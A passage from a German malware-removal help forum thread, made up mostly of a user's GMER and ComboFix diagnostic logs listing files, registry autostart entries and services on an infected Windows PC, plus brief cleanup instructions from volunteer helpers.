bytes JMP 00000000772c0128 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 ---- Kernel code sections - GMER 2.1 ---- INITKDBG C:\Windows\system32\ntoskrnl.exe suspicious modification INITKDBG C:\Windows\system32\ntoskrnl.exe suspicious modification ---- Processes - GMER 2.1 ---- Library C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{10C73F7D-C192-4DD9-B951-F4037A142952}\mpengine.dll (*** suspicious ***) @ C:\Windows\System32\svchost.exe [3964] (Microsoft Malware Protection Engine/Microsoft Corporation)(2015-09-19 14:16:43) 000007feeda50000 ---- EOF - GMER 2.1 ---- |
20.09.2015, 19:39 | #3 |
/// Malwareteam | Malware-gen, Adware-gen ...uswIch habe dein Thema in Arbeit und melde mich so schnell als möglich mit weiteren Anweisungen. Bitte beachte, dass alle meine Antworten zuerst von einem Ausbilder freigegeben werden müssen, bevor ich diese hier posten darf. Dies garantiert, dass Du Hilfe von einem ausgebildeten Helfer bekommst. Ich bedanke mich für deine Geduld
__________________ |
20.09.2015, 21:24 | #4 |
/// Malwareteam | Malware-gen, Adware-gen ...usw Schritt 1 Geh in die Systemsteuerung -> Programme und Funktionen und deinstalliere folgendes Programm:
Schritt 2 Scan mit Combofix
Bitte poste in deiner nächsten Antwort also:
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
21.09.2015, 17:57 | #5 |
| Malware-gen, Adware-gen ...uswCode:
ATTFilter ComboFix 15-09-21.01 - Kenny G 21.09.2015 18:17:02.1.2 - x64 ausgeführt von:: c:\users\Kenny G\Downloads\ComboFix.exe * Neuer Wiederherstellungspunkt wurde erstellt . . (((((((((((((((((((((((((((((((((((( Weitere Löschungen )))))))))))))))))))))))))))))))))))))))))))))))) . . c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net (2).url c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net (3).url c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net.url c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\REAL HIPHOP ?? ???? ????????????????????? - ???? (2).URL . . . . Nicht in der Lage zu löschen c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\REAL HIPHOP ?? ???? ????????????????????? - ????.URL . . . . Nicht in der Lage zu löschen . . ((((((((((((((((((((((( Dateien erstellt von 2015-08-21 bis 2015-09-21 )))))))))))))))))))))))))))))) . . 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\Tabea Studium\AppData\Local\temp 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\eLoot\AppData\Local\temp 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\Default\AppData\Local\temp 2015-09-20 17:15 . 2015-09-20 17:35 -------- d-----w- C:\FRST 2015-09-20 15:43 . 2015-09-20 17:40 113880 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys 2015-09-20 15:42 . 2015-09-20 15:42 -------- d-----w- c:\program files (x86)\ Malwarebytes Anti-Malware 2015-09-20 15:42 . 2015-06-18 06:41 63704 ----a-w- c:\windows\system32\drivers\mwac.sys 2015-09-20 15:42 . 2015-06-18 06:41 109272 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys 2015-09-20 15:42 . 2015-06-18 06:41 25816 ----a-w- c:\windows\system32\drivers\mbam.sys 2015-09-19 15:25 . 2015-09-21 16:10 -------- d-----w- c:\program files (x86)\Trojan Remover 2015-09-19 15:11 . 2015-09-20 15:29 584 ----a-w- C:\task.vbs 2015-09-19 14:17 . 2015-09-19 14:48 -------- d-----w- c:\windows\system32\MRT 2015-09-19 14:16 . 2015-09-16 03:43 11062400 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{10C73F7D-C192-4DD9-B951-F4037A142952}\mpengine.dll 2015-09-19 14:16 . 2015-09-19 14:16 -------- d-----w- c:\windows\system32\EventProviders 2015-09-19 10:25 . 2015-09-19 10:25 -------- d-----r- C:\MSOCache 2015-09-19 10:24 . 2015-09-19 10:24 -------- d-----w- c:\users\Kenny G\AppData\Local\Disc_Soft_Ltd 2015-09-19 10:21 . 2015-09-19 10:21 30264 ----a-w- c:\windows\system32\drivers\dtlitescsibus.sys 2015-09-19 10:21 . 2015-09-19 10:24 -------- d-----w- c:\users\Kenny G\AppData\Roaming\DAEMON Tools Lite 2015-09-19 10:21 . 2015-09-19 10:23 -------- d-----w- c:\program files\DAEMON Tools Lite 2015-09-19 10:21 . 2015-09-19 10:21 -------- d-----w- c:\programdata\DAEMON Tools Lite 2015-09-19 10:15 . 2015-09-19 10:15 -------- d-----w- c:\users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 10:12 . 2015-09-19 23:26 -------- d-----w- c:\program files (x86)\Could not connect. Error code = 0x-1442657579--- 2015-09-19 10:06 . 2015-09-19 10:12 -------- d-----w- c:\programdata\Microsoft Toolkit 2015-09-19 09:06 . 2015-09-19 09:06 -------- d-----w- c:\users\Kenny G\AppData\Local\Microsoft Help 2015-09-19 09:06 . 2015-09-19 14:06 -------- d-----w- c:\programdata\Microsoft Help 2015-09-01 18:31 . 2015-09-01 18:31 -------- d-----w- C:\Backup 2015-08-29 18:33 . 2015-08-29 18:34 -------- d-----w- c:\programdata\Package Cache . . . (((((((((((((((((((((((((((((((((((( Find3M Bericht )))))))))))))))))))))))))))))))))))))))))))))))))))))) . 2015-09-12 10:16 . 2014-01-15 18:58 282296 ----a-w- c:\windows\SysWow64\PnkBstrB.exe 2015-09-12 10:16 . 2014-01-15 18:58 282296 ----a-w- c:\windows\SysWow64\PnkBstrB.xtr 2015-09-12 10:14 . 2014-01-15 18:58 215128 ----a-w- c:\windows\SysWow64\PnkBstrB.ex0 2015-08-26 16:37 . 2009-10-14 05:12 134753440 ----a-w- c:\windows\system32\MRT.exe 2015-08-19 09:53 . 2015-08-19 09:53 297904 ----a-w- c:\windows\system32\drivers\avgidsha.sys 2015-08-19 09:52 . 2015-08-19 09:52 313264 ----a-w- c:\windows\system32\drivers\avgidsdrivera.sys 2015-08-13 00:23 . 2013-10-05 07:44 778440 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe 2015-08-13 00:23 . 2013-10-05 07:44 142536 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl 2015-08-07 09:33 . 2015-08-07 09:34 422400 ----a-w- c:\windows\system32\LavasoftTcpService64.dll 2015-08-07 09:33 . 2015-08-07 09:33 342016 ----a-w- c:\windows\SysWow64\LavasoftTcpService.dll 2015-08-04 09:32 . 2015-08-04 09:32 300464 ----a-w- c:\windows\system32\drivers\avgtdia.sys 2015-08-04 09:32 . 2015-08-04 09:32 250800 ----a-w- c:\windows\system32\drivers\avgmfx64.sys 2015-07-09 05:11 . 2015-03-20 10:20 77760 ----a-w- c:\windows\system32\drivers\avgfwd6a.sys 2010-06-02 04:22 . 2010-06-02 04:22 89944 ----a-w- c:\program files (x86)\DSETUP.dll 2010-06-02 04:22 . 2010-06-02 04:22 537432 ----a-w- c:\program files (x86)\DXSETUP.exe 2010-06-02 04:22 . 2010-06-02 04:22 1801048 ----a-w- c:\program files (x86)\dsetup32.dll . . (((((((((((((((((((((((((((( Autostartpunkte der Registrierung )))))))))))))))))))))))))))))))))))))))) . . *Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. REGEDIT4 . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay] @="{56D36CD8-63C4-425D-B03D-CC30C1711EA4}" [HKEY_CLASSES_ROOT\CLSID\{56D36CD8-63C4-425D-B03D-CC30C1711EA4}] 2012-04-09 15:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay] @="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}" [HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}] 2012-04-09 15:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll . [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "DAEMON Tools Lite Automount"="c:\program files\DAEMON Tools Lite\DTAgent.exe" [2015-06-18 4468056] . [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] "AVG_UI"="c:\program files (x86)\AVG\AVG2015\avgui.exe" [2015-08-24 3775912] . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "ConsentPromptBehaviorAdmin"= 5 (0x5) "ConsentPromptBehaviorUser"= 3 (0x3) "EnableUIADesktopToggle"= 0 (0x0) . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows] "LoadAppInit_DLLs"=1 (0x1) . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-] "Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" . R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x] R2 LavasoftTcpService;LavasoftTcpService;c:\program files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe;c:\program files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [x] R2 MBAMService;MBAMService;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [x] R2 SearchProtectionService;IE Search Set;c:\program files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe;c:\program files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [x] R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x] R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x] R3 Sony PC Companion;Sony PC Companion;c:\program files (x86)\Sony\Sony PC Companion\PCCService.exe;c:\program files (x86)\Sony\Sony PC Companion\PCCService.exe [x] R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x] S0 AVGIDSHA;AVGIDSHA;c:\windows\system32\DRIVERS\avgidsha.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsha.sys [x] S0 Avgloga;AVG Logging Driver;c:\windows\system32\DRIVERS\avgloga.sys;c:\windows\SYSNATIVE\DRIVERS\avgloga.sys [x] S0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\DRIVERS\avgmfx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgmfx64.sys [x] S0 Avgrkx64;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgrkx64.sys [x] S1 Avgdiska;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiska.sys;c:\windows\SYSNATIVE\DRIVERS\avgdiska.sys [x] S1 Avgfwfd;AVG network filter service;c:\windows\system32\DRIVERS\avgfwd6a.sys;c:\windows\SYSNATIVE\DRIVERS\avgfwd6a.sys [x] S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdrivera.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsdrivera.sys [x] S1 Avgldx64;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgldx64.sys [x] S1 Avgtdia;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdia.sys;c:\windows\SYSNATIVE\DRIVERS\avgtdia.sys [x] S1 cbfs3;cbfs3;c:\windows\system32\drivers\cbfs3.sys;c:\windows\SYSNATIVE\drivers\cbfs3.sys [x] S2 avgfws;AVG Firewall;c:\program files (x86)\AVG\AVG2015\avgfws.exe;c:\program files (x86)\AVG\AVG2015\avgfws.exe [x] S2 AVGIDSAgent;AVGIDSAgent;c:\program files (x86)\AVG\AVG2015\avgidsagent.exe;c:\program files (x86)\AVG\AVG2015\avgidsagent.exe [x] S2 avgwd;AVG WatchDog;c:\program files (x86)\AVG\AVG2015\avgwdsvc.exe;c:\program files (x86)\AVG\AVG2015\avgwdsvc.exe [x] S2 CGVPNCliService;CyberGhost 5 Client Service;c:\program files\CyberGhost 5\Service.exe;c:\program files\CyberGhost 5\Service.exe [x] S2 NIHardwareService;NIHardwareService;c:\program files\Common Files\Native Instruments\Hardware\NIHardwareService.exe;c:\program files\Common Files\Native Instruments\Hardware\NIHardwareService.exe [x] S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [x] S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x] S2 WtuSystemSupport;WtuSystemSupport;c:\program files (x86)\AVG Web TuneUp\WtuSystemSupport.exe;c:\program files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [x] S2 zuroluxy;Background Type;c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs;c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [x] S3 Disc Soft Lite Bus Service;Disc Soft Lite Bus Service;c:\program files\DAEMON Tools Lite\DiscSoftBusService.exe;c:\program files\DAEMON Tools Lite\DiscSoftBusService.exe [x] S3 dtlitescsibus;DAEMON Tools Lite Virtual SCSI Bus;c:\windows\system32\DRIVERS\dtlitescsibus.sys;c:\windows\SYSNATIVE\DRIVERS\dtlitescsibus.sys [x] S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x] S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x] . . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}] 2015-09-16 18:24 997704 ----a-w- c:\program files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe . Inhalt des "geplante Tasks" Ordners . 2015-09-03 c:\windows\Tasks\Adobe Flash Player PPAPI Notifier.job - c:\windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13 00:23] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-21 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . 2015-09-21 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51] . . --------- X64 Entries ----------- . . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon1] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon2] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon3] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon4] @="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}" [HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}] 2012-05-02 12:10 1721856 ----a-w- c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay] @="{56D36CD8-63C4-425D-B03D-CC30C1711EA4}" [HKEY_CLASSES_ROOT\CLSID\{56D36CD8-63C4-425D-B03D-CC30C1711EA4}] 2012-04-09 15:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay] @="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}" [HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}] 2012-04-09 15:27 190480 ----a-w- c:\windows\System32\CbFsMntNtf3.dll . [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Nvtmru"="c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" [2013-10-18 1028384] . ------- Zusätzlicher Suchlauf ------- . uLocal Page = c:\windows\system32\blank.htm uStart Page = hxxp://www.google.com mStart Page = about:blank mLocal Page = c:\windows\SysWOW64\blank.htm mDefault_Page_URL = hxxp://www.google.com uSearchAssistant = hxxp://www.google.com IE: Free YouTube Download - c:\program files (x86)\Common Files\DVDVideoSoft\plugins\freeytvdownloader.htm IE: {{07BA1DA9-F501-4796-8728-74D1B91A6CD5} - c:\program files (x86)\PokerStars.EU\PokerStarsUpdate.exe Trusted Zone: localhost Trusted Zone: webcompanion.com TCP: DhcpNameServer = 192.168.2.1 FF - ProfilePath - c:\users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\ FF - prefs.js: browser.startup.homepage - hxxps://www.malwarebytes.org/restorebrowser/ . - - - - Entfernte verwaiste Registrierungseinträge - - - - . Toolbar-Locked - (no file) Wow6432Node-HKCU-Run-Web Companion - c:\program files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse-Agent - c:\program files\Bitdefender\Bitdefender\pmbxag.exe Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse - c:\program files\Bitdefender\Bitdefender\pwdmanui.exe Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse-Anwendungs-Agent - c:\program files\Bitdefender\Bitdefender\antispam32\bdapppassmgr.exe c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopnotes.lnk - (no file) Toolbar-Locked - (no file) AddRemove-Native Instruments Audio 2 DJ Driver - c:\programdata\{033B4844-E9C3-45D2-88D9-34DDF3F91100}\Audio 2 DJ Driver Setup PC.exe AddRemove-Native Instruments Audio 4 DJ Driver - c:\programdata\{4682E4CB-7209-4099-8AA1-580ABCCCE731}\Audio 4 DJ Driver Setup PC.exe AddRemove-Native Instruments Audio 8 DJ Driver - c:\programdata\{D2030082-F62A-402A-9456-8009276FD896}\Audio 8 DJ Driver Setup PC.exe AddRemove-Native Instruments Controller Editor - c:\programdata\{07D05344-6233-4934-88BF-C7E4EEFF9D28}\Controller Editor Setup PC.exe AddRemove-Native Instruments Service Center - c:\programdata\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}\Service Center Setup PC.exe AddRemove-Native Instruments Traktor - c:\programdata\{47803536-1938-4D3F-86D6-F4876B645542}\Traktor Setup PC.exe AddRemove-Native Instruments Traktor 2 - c:\programdata\{9E7BD413-9B42-4EEC-96F4-6FF3CF9791A2}\Traktor 2 Setup PC.exe AddRemove-Native Instruments Traktor Audio 2 Driver - c:\programdata\{0CC85DFF-E70A-4AB0-968A-F1F98F4D0C67}\Traktor Audio 2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Audio 2 MK2 Driver - c:\programdata\{B3478C15-588A-4968-AD66-76AA98803A28}\Traktor Audio 2 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Audio 6 Driver - c:\programdata\{662EAAEC-9E9A-4C69-A658-884E51E909BB}\Traktor Audio 6 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol D2 Driver - c:\programdata\{8D4C602D-E844-4297-BB00-303F1AFBDCBE}\Traktor Kontrol D2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol F1 Driver - c:\programdata\{219191E6-6846-4329-889D-7956C487D9A6}\Traktor Kontrol F1 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S2 Driver - c:\programdata\{9F570B21-E27A-40BE-A508-292899A7D042}\Traktor Kontrol S2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S2 MK2 Driver - c:\programdata\{AF79C86B-2321-4D47-A168-2A24BA2B6A73}\Traktor Kontrol S2 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S4 Driver - c:\programdata\{B7C85E99-2AC6-455D-B4D1-752A56403757}\Traktor Kontrol S4 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S4 MK2 Driver - c:\programdata\{57B31BE2-3175-4425-9722-D2AC5F68C7BD}\Traktor Kontrol S4 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol S8 Driver - c:\programdata\{AD2628D6-C822-4033-AC55-33D833EF2EC9}\Traktor Kontrol S8 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol X1 Driver - c:\programdata\{018F1C44-00D1-417B-B251-92A5634F74AE}\Traktor Kontrol X1 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol X1 MK2 Driver - c:\programdata\{9B09061B-0A4F-42DA-9987-7D3F452DCB09}\Traktor Kontrol X1 MK2 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol Z1 Driver - c:\programdata\{9597097D-B8DC-4754-AF2D-CB61CCFC861A}\Traktor Kontrol Z1 Driver Setup PC.exe AddRemove-Native Instruments Traktor Kontrol Z2 Driver - c:\programdata\{EB21323D-3F46-4EF0-B849-B096B7705C69}\Traktor Kontrol Z2 Driver Setup PC.exe AddRemove-{013CCA52-DA56-4133-AC2B-1988A9568C30} - c:\programdata\{4682E4CB-7209-4099-8AA1-580ABCCCE731}\Audio 4 DJ Driver Setup PC.exe AddRemove-{0886900B-B2F3-452C-B580-60F1253F7F80} - c:\programdata\{07D05344-6233-4934-88BF-C7E4EEFF9D28}\Controller Editor Setup PC.exe AddRemove-{0B8565BA-BAD5-4732-B122-5FD78EFC50A9} - c:\programdata\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}\Service Center Setup PC.exe AddRemove-{1FF959F4-8993-4c52-A397-0CB982C91954} - c:\programdata\{AD2628D6-C822-4033-AC55-33D833EF2EC9}\Traktor Kontrol S8 Driver Setup PC.exe AddRemove-{23A66953-369C-4d22-A189-C6E403D4A19F} - c:\programdata\{033B4844-E9C3-45D2-88D9-34DDF3F91100}\Audio 2 DJ Driver Setup PC.exe AddRemove-{24873332-B98B-4235-ABBA-CCDEACC62BB9} - c:\programdata\{662EAAEC-9E9A-4C69-A658-884E51E909BB}\Traktor Audio 6 Driver Setup PC.exe AddRemove-{28F19F09-F228-49cb-8B90-F97DA7180DD4} - c:\programdata\{B7C85E99-2AC6-455D-B4D1-752A56403757}\Traktor Kontrol S4 Driver Setup PC.exe AddRemove-{2AAC4085-DCBF-417B-AEBD-182197839240} - c:\programdata\{47803536-1938-4D3F-86D6-F4876B645542}\Traktor Setup PC.exe AddRemove-{3054FEFA-4748-4cf0-8C3C-8DB887DE379F} - c:\programdata\{0CC85DFF-E70A-4AB0-968A-F1F98F4D0C67}\Traktor Audio 2 Driver Setup PC.exe AddRemove-{3D8003CE-E3CD-49b7-A59E-9C21546AF95E} - c:\programdata\{9F570B21-E27A-40BE-A508-292899A7D042}\Traktor Kontrol S2 Driver Setup PC.exe AddRemove-{47047AA6-C62D-4334-B9CB-84E0630269EC} - c:\programdata\{AF79C86B-2321-4D47-A168-2A24BA2B6A73}\Traktor Kontrol S2 MK2 Driver Setup PC.exe AddRemove-{470BB39A-7231-4077-AD3D-86067AD04604} - c:\programdata\{D2030082-F62A-402A-9456-8009276FD896}\Audio 8 DJ Driver Setup PC.exe AddRemove-{612601db-4776-4127-bab5-d84b8644e530} - c:\programdata\{018F1C44-00D1-417B-B251-92A5634F74AE}\Traktor Kontrol X1 Driver Setup PC.exe AddRemove-{7ADD3C28-6348-4940-8C10-9ED751F1A543} - c:\programdata\{219191E6-6846-4329-889D-7956C487D9A6}\Traktor Kontrol F1 Driver Setup PC.exe AddRemove-{7B8BA774-C154-4DEE-A92D-D0E7236BB152} - c:\programdata\{B3478C15-588A-4968-AD66-76AA98803A28}\Traktor Audio 2 MK2 Driver Setup PC.exe AddRemove-{938FA945-D818-48A1-BE66-6921B0D649CF} - c:\programdata\{EB21323D-3F46-4EF0-B849-B096B7705C69}\Traktor Kontrol Z2 Driver Setup PC.exe AddRemove-{99640eec-4d74-4df5-95f4-719dc27de6a8} - c:\program files (x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe AddRemove-{A8EC0CC0-AD8D-4244-B080-424EDF7A7634} - c:\programdata\{9E7BD413-9B42-4EEC-96F4-6FF3CF9791A2}\Traktor 2 Setup PC.exe AddRemove-{B861B550-23FD-4E56-9D7F-4E81AFE2B639} - c:\programdata\{8D4C602D-E844-4297-BB00-303F1AFBDCBE}\Traktor Kontrol D2 Driver Setup PC.exe AddRemove-{C39B8892-BB8B-4B0C-AFA6-7B6EE897B286} - c:\programdata\{57B31BE2-3175-4425-9722-D2AC5F68C7BD}\Traktor Kontrol S4 MK2 Driver Setup PC.exe AddRemove-{CD79F608-0EEC-4e8b-A8A3-98A9CB723702} - c:\programdata\{9597097D-B8DC-4754-AF2D-CB61CCFC861A}\Traktor Kontrol Z1 Driver Setup PC.exe AddRemove-{D18B6F23-0B79-448C-9739-29A03843D660} - c:\programdata\{9B09061B-0A4F-42DA-9987-7D3F452DCB09}\Traktor Kontrol X1 MK2 Driver Setup PC.exe . . . [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\zuroluxy] "ImagePath"="c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs" . --------------------- Gesperrte Registrierungsschluessel --------------------- . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}] @Denied: (A 2) (Everyone) @="FlashBroker" "LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_18_0_0_232_ActiveX.exe,-101" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation] "Enabled"=dword:00000001 . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32] @="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_18_0_0_232_ActiveX.exe" . [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib] 